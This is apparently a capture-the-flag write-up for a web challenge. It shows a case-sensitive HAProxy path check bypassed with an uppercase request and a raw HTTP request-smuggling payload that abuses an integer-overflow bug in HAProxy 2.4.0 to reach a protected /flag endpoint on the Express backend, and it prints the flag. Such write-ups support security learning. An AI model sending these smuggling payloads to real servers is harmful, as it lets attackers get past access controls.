Welcome to Web! I struggle everyday I face a new website, can you access /flag endpoint ?
Link: http://128.199.3.34:1235
Author: Kahla
Unintended Solution
The HAProxy configuration to protect the /flag endpoint was case sensitive. Therefore, the following would be sufficient to bypass the validation.
GET /FLAG HTTP/1.1Host:128.199.3.34:1235
HTTP/1.1200OKx-powered-by:Expresscontent-type:text/html; charset=utf-8content-length:43etag:W/"2b-aWQ+/21qg4d1e3yOxiZcpTrSBxw"date:Fri, 13 May 2022 09:34:06 GMTx-server:HaProxy-2.4.0Securinets{W3lC0me_T0_FinAlS_4nD_SmUUgLinG}
Intended Solution
From the server response headers, we know that HAProxy version 2.4.0 is used in front of an Express application. This version is vulnerable to a HTTP request smuggling vulnerability.
Basically, an integer overflow leads to Content-Length0aaa...aaa: being forwarded to the backend as Content-Length: 0, while a second duplicate Content-Length header is used by HAProxy to determine the length of the request body.
POST /test HTTP/1.1Host:128.199.3.34:1235Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:Content-Length:26GET /flag HTTP/1.1DUMMY:GET / HTTP/1.1Host:128.199.3.34:1235
In the above example, HAProxy considers the following to be the first request:
POST /test HTTP/1.1Host:128.199.3.34:1235Content-Length:26GET /flag HTTP/1.1DUMMY:
while the second request is the following:
GET / HTTP/1.1Host:128.199.3.34:1235
However, when forwarded to the backend, this becomes:
POST /test HTTP/1.1Host:128.199.3.34:1235Content-Length:0GET /flag HTTP/1.1DUMMY:GET / HTTP/1.1Host:128.199.3.34:1235
Therefore, the response for the second request will correspond to /flag instead of /.
Due to the way the pipelining works, we have to add some artificial delays when sending the consecutive requests.